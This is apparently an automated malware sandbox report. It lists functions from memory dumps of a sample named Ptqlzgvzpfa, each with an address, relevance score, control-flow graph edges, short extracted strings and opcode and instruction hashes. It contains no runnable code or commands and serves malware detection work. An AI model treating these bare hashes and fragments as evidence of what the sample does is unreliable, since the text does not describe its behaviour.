                                                          • Instruction ID: 734fa4fde54d809c7464610c17ec3198bf7723ffc5e95c5845d7ee0c9b2898a2
                                                          • Opcode Fuzzy Hash: 1038d3fc78b050f88b9abce4e57757491d5d60cfead2f4a2bb0dc0a2e07135d2
                                                          • Instruction Fuzzy Hash: 27F1D234D21209DFCB68DFA4E5986EDBBB2FF49341F209029E816A7394DB345985CF41
                                                          Function 06423A18 Relevance: 2.7, Strings: 2, Instructions: 234COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2473 6423a18-6423a3a 2474 6423a40-6423a42 2473->2474 2475 6423b2e-6423b53 2473->2475 2476 6423b5a-6423b7e 2474->2476 2477 6423a48-6423a54 2474->2477 2475->2476 2489 6423b85-6423ba9 2476->2489 2481 6423a56-6423a62 2477->2481 2482 6423a68-6423a78 2477->2482 2481->2482 2481->2489 2482->2489 2490 6423a7e-6423a8c 2482->2490 2494 6423bb0-6423c21 2489->2494 2493 6423a92-6423a97 2490->2493 2490->2494 2535 6423a99 call 6423c26 2493->2535 2536 6423a99 call 6423c28 2493->2536 2517 6423c23-6423c25 2494->2517 2518 6423c64-6423c69 2494->2518 2496 6423a9f-6423ae8 2511 6423aea-6423b03 2496->2511 2512 6423b0b-6423b2b call 6421f70 2496->2512 2511->2512 2519 6423c6b-6423c6c 2518->2519 2520 6423cac-6423cb3 2518->2520 2521 6423ce0 2519->2521 2522 6423c6e-6423c71 2519->2522 2524 6423cb4-6423cbb 2520->2524 2528 6423ce2-6423ce7 2521->2528 2529 6423d55-6423d6a 2521->2529 2522->2524 2526 6423c73-6423caa call 6421d08 2522->2526 2533 6423cc4 2524->2533 2526->2520 2533->2521 2535->2496 2536->2496
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$Haq
                                                          • API String ID: 0-3785302501
                                                          • Opcode ID: 8eb3ecf5e5f9e5c726582b18cf096b3e497ed5524270aeccc1ae63d305edd304
                                                          • Instruction ID: fe9f2fc78b4e3ef4de85375b0f6ecd611a239731c3e533487f233b8c5a1341c6
                                                          • Opcode Fuzzy Hash: 8eb3ecf5e5f9e5c726582b18cf096b3e497ed5524270aeccc1ae63d305edd304
                                                          • Instruction Fuzzy Hash: B771CF307002259FC756EF69C8549AF7BB7EF99300B6044AEE5029B3A1CF359D06CBA1
                                                          Function 06420549 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2661 6420549-6420550 2662 6420552-6420590 2661->2662 2663 6420595-64205bf 2661->2663 2662->2663 2666 64205c5-64205d1 2663->2666 2667 64206d8-64206fd 2663->2667 2672 64205d7-64205df 2666->2672 2673 6420704-6420776 2666->2673 2667->2673 2680 64205ea-64205ee 2672->2680 2681 64205f0-64205ff 2680->2681 2682 6420601-6420618 2680->2682 2681->2682 2688 6420622-6420624 2682->2688 2689 642061a 2682->2689 2693 642062b-6420638 2688->2693 2691 6420626 2689->2691 2692 642061c-6420620 2689->2692 2691->2693 2692->2688 2692->2691 2695 6420640-6420643 2693->2695 2696 642063a-642063e 2693->2696 2698 6420646-642064e 2695->2698 2696->2698 2699 6420650-6420658 2698->2699 2700 642065a 2698->2700 2702 642065e-64206bd 2699->2702 2700->2702 2705 64206d1-64206d5 2702->2705 2706 64206bf-64206c9 2702->2706 2706->2705
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq$Haq
                                                          • API String ID: 0-3785302501
                                                          • Opcode ID: 42d2ded5d5b3da65df463dacffe58611cf9948392cdeb6a147b08dd1d90cc103
                                                          • Instruction ID: bd10615c2775af4d0ceead25e91830709cb599813f8122fb2cc026a9cbd96037
                                                          • Opcode Fuzzy Hash: 42d2ded5d5b3da65df463dacffe58611cf9948392cdeb6a147b08dd1d90cc103
                                                          • Instruction Fuzzy Hash: 9D5121302043928FD765DF3AD9906AB7BE6EFC1300F10856AE446CB3A6DA74DD49C7A1
                                                          Function 06424FD0 Relevance: 1.8, Strings: 1, Instructions: 557COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (_]q
                                                          • API String ID: 0-188044275
                                                          • Opcode ID: 7e24828860901e0c42930d5db4a524ba7a77bea6dfaeb4e8c0877c3b15140b82
                                                          • Instruction ID: 6de71ab00db8bfe334f44cb1bc7554f47b0a6a0a38bc91e851070a572cfffbc1
                                                          • Opcode Fuzzy Hash: 7e24828860901e0c42930d5db4a524ba7a77bea6dfaeb4e8c0877c3b15140b82
                                                          • Instruction Fuzzy Hash: 56227E75A002169FDB48CF68D494BAEB7B2FF88300F65855AE905DB3A1DB71EC41CB90
                                                          Function 0642EA18 Relevance: 1.6, Strings: 1, Instructions: 367COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq
                                                          • API String ID: 0-600464949
                                                          • Opcode ID: dd7d7d1964d7418131f04a3b918063cd30179fc4384c6c0f1418c6f0c1d7abbf
                                                          • Instruction ID: d63dc8ae1b09ac3eb521ced2f8851cd7803a34012a858bd0cf23de5ab560387c
                                                          • Opcode Fuzzy Hash: dd7d7d1964d7418131f04a3b918063cd30179fc4384c6c0f1418c6f0c1d7abbf
                                                          • Instruction Fuzzy Hash: 0ED18E35710215DFCB45DF68D894A6E7BB6FF89710B6580AAE506DB3A2CB31DC01CB90
                                                          Function 06429D09 Relevance: 1.5, Strings: 1, Instructions: 227COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q
                                                          • API String ID: 0-1259897404
                                                          • Opcode ID: 7beb8ce6dbbf6cf3a5ac0a19e01bcbc3625232057b4bc18e3dc7013399c7924e
                                                          • Instruction ID: 6b68504d55f6f908d245c2b346300c68eb2ab020e4a327254fa57478d8e61c6f
                                                          • Opcode Fuzzy Hash: 7beb8ce6dbbf6cf3a5ac0a19e01bcbc3625232057b4bc18e3dc7013399c7924e
                                                          • Instruction Fuzzy Hash: A7A11F34E10129DFCB44DFA5D89899DBBB2FF88301F658159E905AB365DB70EC42CB50
                                                          Function 01300870 Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2446014812.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1300000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <dtq
                                                          • API String ID: 0-3090548385
                                                          • Opcode ID: 48a9fe4245be3bba1b4d09117a89a9ca1865b5c79f790a11cea51da0c8be2cd4
                                                          • Instruction ID: 67eaded146ece1458c17ae6884f5e967c901d92a885eb55e88b9eb53d45389da
                                                          • Opcode Fuzzy Hash: 48a9fe4245be3bba1b4d09117a89a9ca1865b5c79f790a11cea51da0c8be2cd4
                                                          • Instruction Fuzzy Hash: CF416230A0810DCFDB09DBA8C564ABDBBF9BF48388B108556F106DB7A5D7309D41CB91
                                                          Function 0130E330 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2446014812.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1300000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: TJbq
                                                          • API String ID: 0-1760495472
                                                          • Opcode ID: 7d34b05647dd566ae89321ff167b9fa09290e3ab58099debee6a6479912ef68a
                                                          • Instruction ID: 86d8fdb529e9d5404468a0a0d09c1a466fdf6309362c3a534ed85832be2f93a6
                                                          • Opcode Fuzzy Hash: 7d34b05647dd566ae89321ff167b9fa09290e3ab58099debee6a6479912ef68a
                                                          • Instruction Fuzzy Hash: B351D278E01208DFDB45EFA9E498AADBBF6FF88305F10846AE515A33A0DB305945CF50
                                                          Function 06420448 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq
                                                          • API String ID: 0-600464949
                                                          • Opcode ID: e1880b73293c7d04be1d227daf867604f9873a4421f19df1f9f35bb5215ca328
                                                          • Instruction ID: 56c69cf243327f56d23444cabf0ee7b4c311a19ceea1cc0a45fb69ddbb1d22b1
                                                          • Opcode Fuzzy Hash: e1880b73293c7d04be1d227daf867604f9873a4421f19df1f9f35bb5215ca328
                                                          • Instruction Fuzzy Hash: B93105353042965FDB059E69E8409AF7FA7EF8A320B24803AF905CB361CE719C12C7A0
                                                          Function 062B0D7B Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481025120.00000000062B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_62b0000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q
                                                          • API String ID: 0-1259897404
                                                          • Opcode ID: 20de2407464d217f4cd1886e0a9d1e54989ea325469206739244d0a3d0303c00
                                                          • Instruction ID: 9b1b75e17213a8b55718a87f23c38a725656bd1cdc9c85c65c23fb8cbe24536a
                                                          • Opcode Fuzzy Hash: 20de2407464d217f4cd1886e0a9d1e54989ea325469206739244d0a3d0303c00
                                                          • Instruction Fuzzy Hash: 5C31BD30D2420ACFDB56CFA9E4586FEBBB1FF45340F0090AAD911A7291C7356A45CF91
                                                          Function 0642DC08 Relevance: .4, Instructions: 437COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8742eef6f4ed81d3451348135ee4d39e5f98f1f6b540ea8bb261af7c4bef6eb7
                                                          • Instruction ID: 0b772137ab90865fc70781ce8993fd587fb5ece602e72b3bd733f6bc59ccc0cb
                                                          • Opcode Fuzzy Hash: 8742eef6f4ed81d3451348135ee4d39e5f98f1f6b540ea8bb261af7c4bef6eb7
                                                          • Instruction Fuzzy Hash: F4122C34A00229CFCB55EF65C894A9DB7B2BF89300F6185A9D50AAB355DF30ED85CF50
                                                          Function 06420EC8 Relevance: .2, Instructions: 222COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f82b560c211f362dc0bcb0e0b601b685484d712b3183380c6cd15a3c1aaafef
                                                          • Instruction ID: d1329faad332d6b65bfea06a687dc7d0d8916f0e9b933cd1e190b9dce9c47db2
                                                          • Opcode Fuzzy Hash: 7f82b560c211f362dc0bcb0e0b601b685484d712b3183380c6cd15a3c1aaafef
                                                          • Instruction Fuzzy Hash: 40818D35B012258FCB45DF65E998AAEBBF2EF88701F20806AE9019B391CB75CD41CF50
                                                          Function 0642EEA0 Relevance: .1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 855b1b4e0e69064a18a10b1b5e3ee069d31fafa61a503c239c6195831a18823b
                                                          • Instruction ID: 92c91423f455f2f93f27067dc6567db7b59c5a4c3a37ec07817a40a3597f7291
                                                          • Opcode Fuzzy Hash: 855b1b4e0e69064a18a10b1b5e3ee069d31fafa61a503c239c6195831a18823b
                                                          • Instruction Fuzzy Hash: 2A417335A00119AFDF55DF65D854AEEBBB6FF89310F208066E905B7350CB709D06CBA0
                                                          Function 0642C4D0 Relevance: .1, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be419b2dbf15c0c9a39e584755c9f241471986fcbf9b723143b7347ca72ed05e
                                                          • Instruction ID: 1d18f192758c87a0fe5243e28bcfaf0daded030ab333fff02af537e76d064261
                                                          • Opcode Fuzzy Hash: be419b2dbf15c0c9a39e584755c9f241471986fcbf9b723143b7347ca72ed05e
                                                          • Instruction Fuzzy Hash: C031F536A10115DFCB45DF58D898E99BBB2FF48320B1640A9E6099B372D731ED55CB80
                                                          Function 06421778 Relevance: .1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3022597b8844cd171421e75831eb626141b46b16b3296eb13e9e42063a203047
                                                          • Instruction ID: b696ede5dee1fe692246181fbd2408616bfaddfc9d5a405d83830d94ebe15dd3
                                                          • Opcode Fuzzy Hash: 3022597b8844cd171421e75831eb626141b46b16b3296eb13e9e42063a203047
                                                          • Instruction Fuzzy Hash: E8416B71E0022A8FDB54DFA9C8846AFBBB1FF88744F60853ADA05E7251D730D945CB91
                                                          Function 0642A688 Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99da02968a81d602547e75c83e43b7c5640dec77dd1dd6aea9e071b897acb159
                                                          • Instruction ID: 997ed4c253d86637c63b08288b60c821a4c55b7e2274030cf2575cc13518070a
                                                          • Opcode Fuzzy Hash: 99da02968a81d602547e75c83e43b7c5640dec77dd1dd6aea9e071b897acb159
                                                          • Instruction Fuzzy Hash: BB21C4313052109FC3659A6DE484A67BBA9EFC0311B25847BE54ECB255CB20EC85C754
                                                          Function 06425FD0 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3cf1e700b9fa7411f7ae18ef623faacfaab47e4b525960f8eeae414b8fc05a6e
                                                          • Instruction ID: c6326efc9cd2bac5e439b42bc745e5336a7647c0de6efc318c743cdd41225569
                                                          • Opcode Fuzzy Hash: 3cf1e700b9fa7411f7ae18ef623faacfaab47e4b525960f8eeae414b8fc05a6e
                                                          • Instruction Fuzzy Hash: 9831B4316002159FDF15CF19D884EAA3BA6FF45344F25816AF905CB3A1CB75EC95CB90
                                                          Function 0642FC70 Relevance: .1, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c3e865c6d9fdace1909137c17750f7d553fbcbcf4f9e0e2e50183eaada9931fd
                                                          • Instruction ID: 6206464bf73e62826175d8b313c707621171255ac5311a8bb12c49003c06092c
                                                          • Opcode Fuzzy Hash: c3e865c6d9fdace1909137c17750f7d553fbcbcf4f9e0e2e50183eaada9931fd
                                                          • Instruction Fuzzy Hash: A921B834A1061A8FCB45EF65C8549AEBBB5FF8A700F50416BD51697360DB305E06CBE1
                                                          Function 06421768 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 707ea6a74dc90bf08438ef6a74109d381257b9e257e83bd2da5baaac3c68660f
                                                          • Instruction ID: cc901addaee09fa98e2c61501370cf19721783ce38471d8b2a38c99bf8dceff5
                                                          • Opcode Fuzzy Hash: 707ea6a74dc90bf08438ef6a74109d381257b9e257e83bd2da5baaac3c68660f
                                                          • Instruction Fuzzy Hash: B6217F70E0022A8FCB54DF79C884AAFB7B1FF88744F50457ADA0697351D7309902CBA0
                                                          Function 0642FC80 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de505c45a2a177d7dd9453a3b1d2738e2d58a2e729160368cfecaf94ecebee0c
                                                          • Instruction ID: 0cda2ba8a56cfa6a2e452aad862f0e6a44baaaf84dd26fc13f933a51332ab9dc
                                                          • Opcode Fuzzy Hash: de505c45a2a177d7dd9453a3b1d2738e2d58a2e729160368cfecaf94ecebee0c
                                                          • Instruction Fuzzy Hash: 0E219134B0061ACFCB40EFA9C4548AEB7B5FF89600F50416AD506A7324EF30AA46CB91
                                                          Function 0130A818 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2446014812.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1300000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 981f4344dcf85dce43881b98e43d2ee62070ec3d69c91e3e939ca8311e4d0043
                                                          • Instruction ID: 8563b3202e9d63b26ca84774bd0f864dd6d74dc7ea744cad9f89bc5b81ffb32f
                                                          • Opcode Fuzzy Hash: 981f4344dcf85dce43881b98e43d2ee62070ec3d69c91e3e939ca8311e4d0043
                                                          • Instruction Fuzzy Hash: 0921F5B4D0520DCFDB05DFAAE4543EEBBF6FB88304F008429D515A3280DB754A468F91
                                                          Function 012BD030 Relevance: .1, Instructions: 74COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2445723480.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_12bd000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bde57af7c581a4d2720561c48c576c9cc25ab55eda753fe7e9fbed2c84af16af
                                                          • Instruction ID: fb61632429ccfa4ffe606547bb91240d001142792e669ef8c25d1220e7beacd6
                                                          • Opcode Fuzzy Hash: bde57af7c581a4d2720561c48c576c9cc25ab55eda753fe7e9fbed2c84af16af
                                                          • Instruction Fuzzy Hash: 73213771524208DFCB15DF58D9C4BA6BF65FB84398F24C969DA090B246C37AD406CBB2
                                                          Function 06427DA8 Relevance: .1, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5419d5ada9565269af8e35bc029fc2da4b81883d0a2e96dc3702a241afab5298
                                                          • Instruction ID: c120b5cdd00bdfd6d0f2d572c78b75b9cf25ca06736f46a1ebbeb8142b33b62c
                                                          • Opcode Fuzzy Hash: 5419d5ada9565269af8e35bc029fc2da4b81883d0a2e96dc3702a241afab5298
                                                          • Instruction Fuzzy Hash: 23216B71A0022A8FDB09DF54C940ADEB7F2FF48300F6042A9E405BB3A1CB759E45CBA0
                                                          Function 01306680 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2446014812.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1300000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1818dfc452c99504fa0b61b4d911fcbc136edbf9cb4a458a640a21d5fa11c476
                                                          • Instruction ID: 20d74ebf20cd31371d447f5c9f161a91de6069b80f22c691dd1125e469029392
                                                          • Opcode Fuzzy Hash: 1818dfc452c99504fa0b61b4d911fcbc136edbf9cb4a458a640a21d5fa11c476
                                                          • Instruction Fuzzy Hash: 142128B0D0160CDFD701EFA8E89A7AEBBF5FB45318F10C4A5E109A3294D7B84A948F51
                                                          Function 06427DB8 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6420000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: acb080bc091d303305696c7dd97f4a9dbcb1ae041324d47c62ff19154f4d2f73
                                                          • Instruction ID: 95af20d4ba818ca8b7ee99b3c3faa79fb995cf9ac11e810708f784e2b7c14486
                                                          • Opcode Fuzzy Hash: acb080bc091d303305696c7dd97f4a9dbcb1ae041324d47c62ff19154f4d2f73
                                                          • Instruction Fuzzy Hash: DA211731A0022A8FDB45DF54D540ADEB7F2FF48300F6041A9E505BB3A5C775AE45CBA0
                                                          Function 0130177E Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2446014812.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1300000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e19c61cf9d1bd8266b5b69dfdd0d1b83c43358d0f4db8f93307891882ef2af45
                                                          • Instruction ID: 9c36ab2add9b234dd78ff97b60bdb7dbea98f351a97e93d2e056fa8a86752e7e
                                                          • Opcode Fuzzy Hash: e19c61cf9d1bd8266b5b69dfdd0d1b83c43358d0f4db8f93307891882ef2af45
                                                          • Instruction Fuzzy Hash: 2621F335A002189FDB16CBA8C960BEE7BF1EF89715F148465D406AB2C1CA31DD02CB50
                                                          Function 01306690 Relevance: .1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2446014812.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1300000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a568a7f6c062d2b3c67182314bd2bcc0bd1313b72fe55a6cc29d4fac747dc07
                                                          • Instruction ID: dc6e38f65884a902ddd7f812a68e40dfcc985d578247eeaaa192b22110f53c07
                                                          • Opcode Fuzzy Hash: 2a568a7f6c062d2b3c67182314bd2bcc0bd1313b72fe55a6cc29d4fac747dc07
                                                          • Instruction Fuzzy Hash: 1A2139B090560CDFDB01EFA8E4A97AEBBF5FB49318F10C4A5D109A3294D7B44A54CF01
                                                          Function 0130BBE0 Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2446014812.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1300000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4b64c2eaafbfccd24e2bdd1b50b6bbf6603ec82da8708f470f33298f3f7e9f6c
                                                          • Instruction ID: 82acf05abd5069c0cd14a42fb153bee0460b0ba2c34b593f0b2b4ca8801da820
                                                          • Opcode Fuzzy Hash: 4b64c2eaafbfccd24e2bdd1b50b6bbf6603ec82da8708f470f33298f3f7e9f6c
                                                          • Instruction Fuzzy Hash: 4F111278D0020DCBCF09CF99D8546EEFBFAEB88314F14842AD505B3298DB301A84CBA4
                                                          Function 012BD02B Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2445723480.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_12bd000_Ptqlzgvzpfa.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
                                                          • Instruction ID: 35221200565cd2f8cd9b52b49b98bd5e72d24aec1cf564eacc36b1008927a1ce
                                                          • Opcode Fuzzy Hash: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
                                                          • Instruction Fuzzy Hash: 8C11D076504285CFDB12CF54D9C4B96BF72FB84314F24C6AADD090B656C33AD41ACBA2
                                                          Function 06420D00 Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2481372372.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                          Joe Sandbox IDA Plugin
